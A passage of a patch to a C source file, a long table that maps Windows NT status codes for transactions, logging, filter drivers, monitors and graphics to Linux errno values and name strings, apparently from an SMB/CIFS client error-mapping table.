+-	{STATUS_TRANSACTIONMANAGER_NOT_ONLINE, -EIO,
+-	"STATUS_TRANSACTIONMANAGER_NOT_ONLINE"},
+-	{STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION, -EIO,
+-	"STATUS_TRANSACTIONMANAGER_RECOVERY_NAME_COLLISION"},
+-	{STATUS_TRANSACTION_NOT_ROOT, -EIO, "STATUS_TRANSACTION_NOT_ROOT"},
+-	{STATUS_TRANSACTION_OBJECT_EXPIRED, -EIO,
+-	"STATUS_TRANSACTION_OBJECT_EXPIRED"},
+-	{STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION, -EIO,
+-	"STATUS_COMPRESSION_NOT_ALLOWED_IN_TRANSACTION"},
+-	{STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED, -EIO,
+-	"STATUS_TRANSACTION_RESPONSE_NOT_ENLISTED"},
+-	{STATUS_TRANSACTION_RECORD_TOO_LONG, -EIO,
+-	"STATUS_TRANSACTION_RECORD_TOO_LONG"},
+-	{STATUS_NO_LINK_TRACKING_IN_TRANSACTION, -EIO,
+-	"STATUS_NO_LINK_TRACKING_IN_TRANSACTION"},
+-	{STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION, -EOPNOTSUPP,
+-	"STATUS_OPERATION_NOT_SUPPORTED_IN_TRANSACTION"},
+-	{STATUS_TRANSACTION_INTEGRITY_VIOLATED, -EIO,
+-	"STATUS_TRANSACTION_INTEGRITY_VIOLATED"},
+-	{STATUS_LOG_SECTOR_INVALID, -EIO, "STATUS_LOG_SECTOR_INVALID"},
+-	{STATUS_LOG_SECTOR_PARITY_INVALID, -EIO,
+-	"STATUS_LOG_SECTOR_PARITY_INVALID"},
+-	{STATUS_LOG_SECTOR_REMAPPED, -EIO, "STATUS_LOG_SECTOR_REMAPPED"},
+-	{STATUS_LOG_BLOCK_INCOMPLETE, -EIO, "STATUS_LOG_BLOCK_INCOMPLETE"},
+-	{STATUS_LOG_INVALID_RANGE, -EIO, "STATUS_LOG_INVALID_RANGE"},
+-	{STATUS_LOG_BLOCKS_EXHAUSTED, -EIO, "STATUS_LOG_BLOCKS_EXHAUSTED"},
+-	{STATUS_LOG_READ_CONTEXT_INVALID, -EIO,
+-	"STATUS_LOG_READ_CONTEXT_INVALID"},
+-	{STATUS_LOG_RESTART_INVALID, -EIO, "STATUS_LOG_RESTART_INVALID"},
+-	{STATUS_LOG_BLOCK_VERSION, -EIO, "STATUS_LOG_BLOCK_VERSION"},
+-	{STATUS_LOG_BLOCK_INVALID, -EIO, "STATUS_LOG_BLOCK_INVALID"},
+-	{STATUS_LOG_READ_MODE_INVALID, -EIO, "STATUS_LOG_READ_MODE_INVALID"},
+-	{STATUS_LOG_METADATA_CORRUPT, -EIO, "STATUS_LOG_METADATA_CORRUPT"},
+-	{STATUS_LOG_METADATA_INVALID, -EIO, "STATUS_LOG_METADATA_INVALID"},
+-	{STATUS_LOG_METADATA_INCONSISTENT, -EIO,
+-	"STATUS_LOG_METADATA_INCONSISTENT"},
+-	{STATUS_LOG_RESERVATION_INVALID, -EIO,
+-	"STATUS_LOG_RESERVATION_INVALID"},
+-	{STATUS_LOG_CANT_DELETE, -EIO, "STATUS_LOG_CANT_DELETE"},
+-	{STATUS_LOG_CONTAINER_LIMIT_EXCEEDED, -EIO,
+-	"STATUS_LOG_CONTAINER_LIMIT_EXCEEDED"},
+-	{STATUS_LOG_START_OF_LOG, -EIO, "STATUS_LOG_START_OF_LOG"},
+-	{STATUS_LOG_POLICY_ALREADY_INSTALLED, -EIO,
+-	"STATUS_LOG_POLICY_ALREADY_INSTALLED"},
+-	{STATUS_LOG_POLICY_NOT_INSTALLED, -EIO,
+-	"STATUS_LOG_POLICY_NOT_INSTALLED"},
+-	{STATUS_LOG_POLICY_INVALID, -EIO, "STATUS_LOG_POLICY_INVALID"},
+-	{STATUS_LOG_POLICY_CONFLICT, -EIO, "STATUS_LOG_POLICY_CONFLICT"},
+-	{STATUS_LOG_PINNED_ARCHIVE_TAIL, -EIO,
+-	"STATUS_LOG_PINNED_ARCHIVE_TAIL"},
+-	{STATUS_LOG_RECORD_NONEXISTENT, -EIO, "STATUS_LOG_RECORD_NONEXISTENT"},
+-	{STATUS_LOG_RECORDS_RESERVED_INVALID, -EIO,
+-	"STATUS_LOG_RECORDS_RESERVED_INVALID"},
+-	{STATUS_LOG_SPACE_RESERVED_INVALID, -EIO,
+-	"STATUS_LOG_SPACE_RESERVED_INVALID"},
+-	{STATUS_LOG_TAIL_INVALID, -EIO, "STATUS_LOG_TAIL_INVALID"},
+-	{STATUS_LOG_FULL, -EIO, "STATUS_LOG_FULL"},
+-	{STATUS_LOG_MULTIPLEXED, -EIO, "STATUS_LOG_MULTIPLEXED"},
+-	{STATUS_LOG_DEDICATED, -EIO, "STATUS_LOG_DEDICATED"},
+-	{STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS, -EIO,
+-	"STATUS_LOG_ARCHIVE_NOT_IN_PROGRESS"},
+-	{STATUS_LOG_ARCHIVE_IN_PROGRESS, -EIO,
+-	"STATUS_LOG_ARCHIVE_IN_PROGRESS"},
+-	{STATUS_LOG_EPHEMERAL, -EIO, "STATUS_LOG_EPHEMERAL"},
+-	{STATUS_LOG_NOT_ENOUGH_CONTAINERS, -EIO,
+-	"STATUS_LOG_NOT_ENOUGH_CONTAINERS"},
+-	{STATUS_LOG_CLIENT_ALREADY_REGISTERED, -EIO,
+-	"STATUS_LOG_CLIENT_ALREADY_REGISTERED"},
+-	{STATUS_LOG_CLIENT_NOT_REGISTERED, -EIO,
+-	"STATUS_LOG_CLIENT_NOT_REGISTERED"},
+-	{STATUS_LOG_FULL_HANDLER_IN_PROGRESS, -EIO,
+-	"STATUS_LOG_FULL_HANDLER_IN_PROGRESS"},
+-	{STATUS_LOG_CONTAINER_READ_FAILED, -EIO,
+-	"STATUS_LOG_CONTAINER_READ_FAILED"},
+-	{STATUS_LOG_CONTAINER_WRITE_FAILED, -EIO,
+-	"STATUS_LOG_CONTAINER_WRITE_FAILED"},
+-	{STATUS_LOG_CONTAINER_OPEN_FAILED, -EIO,
+-	"STATUS_LOG_CONTAINER_OPEN_FAILED"},
+-	{STATUS_LOG_CONTAINER_STATE_INVALID, -EIO,
+-	"STATUS_LOG_CONTAINER_STATE_INVALID"},
+-	{STATUS_LOG_STATE_INVALID, -EIO, "STATUS_LOG_STATE_INVALID"},
+-	{STATUS_LOG_PINNED, -EIO, "STATUS_LOG_PINNED"},
+-	{STATUS_LOG_METADATA_FLUSH_FAILED, -EIO,
+-	"STATUS_LOG_METADATA_FLUSH_FAILED"},
+-	{STATUS_LOG_INCONSISTENT_SECURITY, -EIO,
+-	"STATUS_LOG_INCONSISTENT_SECURITY"},
+-	{STATUS_LOG_APPENDED_FLUSH_FAILED, -EIO,
+-	"STATUS_LOG_APPENDED_FLUSH_FAILED"},
+-	{STATUS_LOG_PINNED_RESERVATION, -EIO, "STATUS_LOG_PINNED_RESERVATION"},
+-	{STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD, -EIO,
+-	"STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD"},
+-	{STATUS_FLT_NO_HANDLER_DEFINED, -EIO, "STATUS_FLT_NO_HANDLER_DEFINED"},
+-	{STATUS_FLT_CONTEXT_ALREADY_DEFINED, -EIO,
+-	"STATUS_FLT_CONTEXT_ALREADY_DEFINED"},
+-	{STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST, -EIO,
+-	"STATUS_FLT_INVALID_ASYNCHRONOUS_REQUEST"},
+-	{STATUS_FLT_DISALLOW_FAST_IO, -EIO, "STATUS_FLT_DISALLOW_FAST_IO"},
+-	{STATUS_FLT_INVALID_NAME_REQUEST, -EIO,
+-	"STATUS_FLT_INVALID_NAME_REQUEST"},
+-	{STATUS_FLT_NOT_SAFE_TO_POST_OPERATION, -EIO,
+-	"STATUS_FLT_NOT_SAFE_TO_POST_OPERATION"},
+-	{STATUS_FLT_NOT_INITIALIZED, -EIO, "STATUS_FLT_NOT_INITIALIZED"},
+-	{STATUS_FLT_FILTER_NOT_READY, -EIO, "STATUS_FLT_FILTER_NOT_READY"},
+-	{STATUS_FLT_POST_OPERATION_CLEANUP, -EIO,
+-	"STATUS_FLT_POST_OPERATION_CLEANUP"},
+-	{STATUS_FLT_INTERNAL_ERROR, -EIO, "STATUS_FLT_INTERNAL_ERROR"},
+-	{STATUS_FLT_DELETING_OBJECT, -EIO, "STATUS_FLT_DELETING_OBJECT"},
+-	{STATUS_FLT_MUST_BE_NONPAGED_POOL, -EIO,
+-	"STATUS_FLT_MUST_BE_NONPAGED_POOL"},
+-	{STATUS_FLT_DUPLICATE_ENTRY, -EIO, "STATUS_FLT_DUPLICATE_ENTRY"},
+-	{STATUS_FLT_CBDQ_DISABLED, -EIO, "STATUS_FLT_CBDQ_DISABLED"},
+-	{STATUS_FLT_DO_NOT_ATTACH, -EIO, "STATUS_FLT_DO_NOT_ATTACH"},
+-	{STATUS_FLT_DO_NOT_DETACH, -EIO, "STATUS_FLT_DO_NOT_DETACH"},
+-	{STATUS_FLT_INSTANCE_ALTITUDE_COLLISION, -EIO,
+-	"STATUS_FLT_INSTANCE_ALTITUDE_COLLISION"},
+-	{STATUS_FLT_INSTANCE_NAME_COLLISION, -EIO,
+-	"STATUS_FLT_INSTANCE_NAME_COLLISION"},
+-	{STATUS_FLT_FILTER_NOT_FOUND, -EIO, "STATUS_FLT_FILTER_NOT_FOUND"},
+-	{STATUS_FLT_VOLUME_NOT_FOUND, -EIO, "STATUS_FLT_VOLUME_NOT_FOUND"},
+-	{STATUS_FLT_INSTANCE_NOT_FOUND, -EIO, "STATUS_FLT_INSTANCE_NOT_FOUND"},
+-	{STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND, -EIO,
+-	"STATUS_FLT_CONTEXT_ALLOCATION_NOT_FOUND"},
+-	{STATUS_FLT_INVALID_CONTEXT_REGISTRATION, -EIO,
+-	"STATUS_FLT_INVALID_CONTEXT_REGISTRATION"},
+-	{STATUS_FLT_NAME_CACHE_MISS, -EIO, "STATUS_FLT_NAME_CACHE_MISS"},
+-	{STATUS_FLT_NO_DEVICE_OBJECT, -EIO, "STATUS_FLT_NO_DEVICE_OBJECT"},
+-	{STATUS_FLT_VOLUME_ALREADY_MOUNTED, -EIO,
+-	"STATUS_FLT_VOLUME_ALREADY_MOUNTED"},
+-	{STATUS_FLT_ALREADY_ENLISTED, -EIO, "STATUS_FLT_ALREADY_ENLISTED"},
+-	{STATUS_FLT_CONTEXT_ALREADY_LINKED, -EIO,
+-	"STATUS_FLT_CONTEXT_ALREADY_LINKED"},
+-	{STATUS_FLT_NO_WAITER_FOR_REPLY, -EIO,
+-	"STATUS_FLT_NO_WAITER_FOR_REPLY"},
+-	{STATUS_MONITOR_NO_DESCRIPTOR, -EIO, "STATUS_MONITOR_NO_DESCRIPTOR"},
+-	{STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT, -EIO,
+-	"STATUS_MONITOR_UNKNOWN_DESCRIPTOR_FORMAT"},
+-	{STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM, -EIO,
+-	"STATUS_MONITOR_INVALID_DESCRIPTOR_CHECKSUM"},
+-	{STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK, -EIO,
+-	"STATUS_MONITOR_INVALID_STANDARD_TIMING_BLOCK"},
+-	{STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED, -EIO,
+-	"STATUS_MONITOR_WMI_DATABLOCK_REGISTRATION_FAILED"},
+-	{STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK, -EIO,
+-	"STATUS_MONITOR_INVALID_SERIAL_NUMBER_MONDSC_BLOCK"},
+-	{STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK, -EIO,
+-	"STATUS_MONITOR_INVALID_USER_FRIENDLY_MONDSC_BLOCK"},
+-	{STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA, -EIO,
+-	"STATUS_MONITOR_NO_MORE_DESCRIPTOR_DATA"},
+-	{STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK, -EIO,
+-	"STATUS_MONITOR_INVALID_DETAILED_TIMING_BLOCK"},
+-	{STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER, -EIO,
+-	"STATUS_GRAPHICS_NOT_EXCLUSIVE_MODE_OWNER"},
+-	{STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER, -EIO,
+-	"STATUS_GRAPHICS_INSUFFICIENT_DMA_BUFFER"},
+-	{STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER, -EIO,
+-	"STATUS_GRAPHICS_INVALID_DISPLAY_ADAPTER"},
+-	{STATUS_GRAPHICS_ADAPTER_WAS_RESET, -EIO,
+-	"STATUS_GRAPHICS_ADAPTER_WAS_RESET"},
+-	{STATUS_GRAPHICS_INVALID_DRIVER_MODEL, -EIO,
+-	"STATUS_GRAPHICS_INVALID_DRIVER_MODEL"},
+-	{STATUS_GRAPHICS_PRESENT_MODE_CHANGED, -EIO,
+-	"STATUS_GRAPHICS_PRESENT_MODE_CHANGED"},
+-	{STATUS_GRAPHICS_PRESENT_OCCLUDED, -EIO,
+-	"STATUS_GRAPHICS_PRESENT_OCCLUDED"},
+-	{STATUS_GRAPHICS_PRESENT_DENIED, -EIO,
+-	"STATUS_GRAPHICS_PRESENT_DENIED"},
+-	{STATUS_GRAPHICS_CANNOTCOLORCONVERT, -EIO,
+-	"STATUS_GRAPHICS_CANNOTCOLORCONVERT"},
+-	{STATUS_GRAPHICS_NO_VIDEO_MEMORY, -EIO,
+-	"STATUS_GRAPHICS_NO_VIDEO_MEMORY"},
+-	{STATUS_GRAPHICS_CANT_LOCK_MEMORY, -EIO,
+-	"STATUS_GRAPHICS_CANT_LOCK_MEMORY"},
+-	{STATUS_GRAPHICS_ALLOCATION_BUSY, -EBUSY,
+-	"STATUS_GRAPHICS_ALLOCATION_BUSY"},
+-	{STATUS_GRAPHICS_TOO_MANY_REFERENCES, -EIO,
+-	"STATUS_GRAPHICS_TOO_MANY_REFERENCES"},
+-	{STATUS_GRAPHICS_TRY_AGAIN_LATER, -EIO,
+-	"STATUS_GRAPHICS_TRY_AGAIN_LATER"},
+-	{STATUS_GRAPHICS_TRY_AGAIN_NOW, -EIO, "STATUS_GRAPHICS_TRY_AGAIN_NOW"},
+-	{STATUS_GRAPHICS_ALLOCATION_INVALID, -EIO,
+-	"STATUS_GRAPHICS_ALLOCATION_INVALID"},
+-	{STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE, -EIO,
+-	"STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNAVAILABLE"},
+-	{STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_UNSWIZZLING_APERTURE_UNSUPPORTED"},
+-	{STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION, -EIO,
+-	"STATUS_GRAPHICS_CANT_EVICT_PINNED_ALLOCATION"},
+-	{STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_ALLOCATION_USAGE"},
+-	{STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION, -EIO,
+-	"STATUS_GRAPHICS_CANT_RENDER_LOCKED_ALLOCATION"},
+-	{STATUS_GRAPHICS_ALLOCATION_CLOSED, -EIO,
+-	"STATUS_GRAPHICS_ALLOCATION_CLOSED"},
+-	{STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_ALLOCATION_INSTANCE"},
+-	{STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_ALLOCATION_HANDLE"},
+-	{STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE, -EIO,
+-	"STATUS_GRAPHICS_WRONG_ALLOCATION_DEVICE"},
+-	{STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST, -EIO,
+-	"STATUS_GRAPHICS_ALLOCATION_CONTENT_LOST"},
+-	{STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE, -EIO,
+-	"STATUS_GRAPHICS_GPU_EXCEPTION_ON_DEVICE"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_VIDPN_TOPOLOGY_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_VIDPN_TOPOLOGY_CURRENTLY_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN, -EIO, "STATUS_GRAPHICS_INVALID_VIDPN"},
+-	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE"},
+-	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET"},
+-	{STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_VIDPN_MODALITY_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDPN_SOURCEMODESET"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDPN_TARGETMODESET"},
+-	{STATUS_GRAPHICS_INVALID_FREQUENCY, -EIO,
+-	"STATUS_GRAPHICS_INVALID_FREQUENCY"},
+-	{STATUS_GRAPHICS_INVALID_ACTIVE_REGION, -EIO,
+-	"STATUS_GRAPHICS_INVALID_ACTIVE_REGION"},
+-	{STATUS_GRAPHICS_INVALID_TOTAL_REGION, -EIO,
+-	"STATUS_GRAPHICS_INVALID_TOTAL_REGION"},
+-	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_SOURCE_MODE"},
+-	{STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDEO_PRESENT_TARGET_MODE"},
+-	{STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_PINNED_MODE_MUST_REMAIN_IN_SET"},
+-	{STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_PATH_ALREADY_IN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET, -EIO,
+-	"STATUS_GRAPHICS_MODE_ALREADY_IN_MODESET"},
+-	{STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDEOPRESENTSOURCESET"},
+-	{STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDEOPRESENTTARGETSET"},
+-	{STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_SOURCE_ALREADY_IN_SET"},
+-	{STATUS_GRAPHICS_TARGET_ALREADY_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_TARGET_ALREADY_IN_SET"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDPN_PRESENT_PATH"},
+-	{STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_NO_RECOMMENDED_VIDPN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGESET"},
+-	{STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITOR_FREQUENCYRANGE"},
+-	{STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_FREQUENCYRANGE_NOT_IN_SET"},
+-	{STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_FREQUENCYRANGE_ALREADY_IN_SET"},
+-	{STATUS_GRAPHICS_STALE_MODESET, -EIO, "STATUS_GRAPHICS_STALE_MODESET"},
+-	{STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITOR_SOURCEMODESET"},
+-	{STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITOR_SOURCE_MODE"},
+-	{STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN, -EIO,
+-	"STATUS_GRAPHICS_NO_RECOMMENDED_FUNCTIONAL_VIDPN"},
+-	{STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE, -EIO,
+-	"STATUS_GRAPHICS_MODE_ID_MUST_BE_UNIQUE"},
+-	{STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION, -EIO,
+-	"STATUS_GRAPHICS_EMPTY_ADAPTER_MONITOR_MODE_SUPPORT_INTERSECTION"},
+-	{STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES, -EIO,
+-	"STATUS_GRAPHICS_VIDEO_PRESENT_TARGETS_LESS_THAN_SOURCES"},
+-	{STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_PATH_NOT_IN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE, -EIO,
+-	"STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_SOURCE"},
+-	{STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET, -EIO,
+-	"STATUS_GRAPHICS_ADAPTER_MUST_HAVE_AT_LEAST_ONE_TARGET"},
+-	{STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITORDESCRIPTORSET"},
+-	{STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR, -EIO,
+-	"STATUS_GRAPHICS_INVALID_MONITORDESCRIPTOR"},
+-	{STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_MONITORDESCRIPTOR_NOT_IN_SET"},
+-	{STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET, -EIO,
+-	"STATUS_GRAPHICS_MONITORDESCRIPTOR_ALREADY_IN_SET"},
+-	{STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE, -EIO,
+-	"STATUS_GRAPHICS_MONITORDESCRIPTOR_ID_MUST_BE_UNIQUE"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDPN_TARGET_SUBSET_TYPE"},
+-	{STATUS_GRAPHICS_RESOURCES_NOT_RELATED, -EIO,
+-	"STATUS_GRAPHICS_RESOURCES_NOT_RELATED"},
+-	{STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE, -EIO,
+-	"STATUS_GRAPHICS_SOURCE_ID_MUST_BE_UNIQUE"},
+-	{STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE, -EIO,
+-	"STATUS_GRAPHICS_TARGET_ID_MUST_BE_UNIQUE"},
+-	{STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET, -EIO,
+-	"STATUS_GRAPHICS_NO_AVAILABLE_VIDPN_TARGET"},
+-	{STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER, -EIO,
+-	"STATUS_GRAPHICS_MONITOR_COULD_NOT_BE_ASSOCIATED_WITH_ADAPTER"},
+-	{STATUS_GRAPHICS_NO_VIDPNMGR, -EIO, "STATUS_GRAPHICS_NO_VIDPNMGR"},
+-	{STATUS_GRAPHICS_NO_ACTIVE_VIDPN, -EIO,
+-	"STATUS_GRAPHICS_NO_ACTIVE_VIDPN"},
+-	{STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_STALE_VIDPN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_MONITOR_NOT_CONNECTED, -EIO,
+-	"STATUS_GRAPHICS_MONITOR_NOT_CONNECTED"},
+-	{STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_SOURCE_NOT_IN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PRIMARYSURFACE_SIZE"},
+-	{STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VISIBLEREGION_SIZE"},
+-	{STATUS_GRAPHICS_INVALID_STRIDE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_STRIDE"},
+-	{STATUS_GRAPHICS_INVALID_PIXELFORMAT, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PIXELFORMAT"},
+-	{STATUS_GRAPHICS_INVALID_COLORBASIS, -EIO,
+-	"STATUS_GRAPHICS_INVALID_COLORBASIS"},
+-	{STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PIXELVALUEACCESSMODE"},
+-	{STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY, -EIO,
+-	"STATUS_GRAPHICS_TARGET_NOT_IN_TOPOLOGY"},
+-	{STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT, -EIO,
+-	"STATUS_GRAPHICS_NO_DISPLAY_MODE_MANAGEMENT_SUPPORT"},
+-	{STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE, -EIO,
+-	"STATUS_GRAPHICS_VIDPN_SOURCE_IN_USE"},
+-	{STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN, -EIO,
+-	"STATUS_GRAPHICS_CANT_ACCESS_ACTIVE_VIDPN"},
+-	{STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PATH_IMPORTANCE_ORDINAL"},
+-	{STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PATH_CONTENT_GEOMETRY_TRANSFORMATION"},
+-	{STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED,
+-	-EIO,
+-	"STATUS_GRAPHICS_PATH_CONTENT_GEOMETRY_TRANSFORMATION_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_INVALID_GAMMA_RAMP, -EIO,
+-	"STATUS_GRAPHICS_INVALID_GAMMA_RAMP"},
+-	{STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_GAMMA_RAMP_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED, -EIO,
+-	"STATUS_GRAPHICS_MULTISAMPLING_NOT_SUPPORTED"},
+-	{STATUS_GRAPHICS_MODE_NOT_IN_MODESET, -EIO,
+-	"STATUS_GRAPHICS_MODE_NOT_IN_MODESET"},
+-	{STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON, -EIO,
+-	"STATUS_GRAPHICS_INVALID_VIDPN_TOPOLOGY_RECOMMENDATION_REASON"},
+-	{STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_PATH_CONTENT_TYPE"},
+-	{STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE, -EIO,
+-	"STATUS_GRAPHICS_INVALID_COPYPROTECTION_TYPE"},
+-	{STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS, -EIO,
+-	"STATUS_GRAPHICS_UNASSIGNED_MODESET_ALREADY_EXISTS"},
+-	{STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING, -EIO,
+-	"STATUS_GRAPHICS_INVALID_SCANLINE_ORDERING"},
+-	{STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED, -EIO,
+-	"STATUS_GRAPHICS_TOPOLOGY_CHANGES_NOT_ALLOWED"},
+-	{STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS, -EIO,
+-	"STATUS_GRAPHICS_NO_AVAILABLE_IMPORTANCE_ORDINALS"},
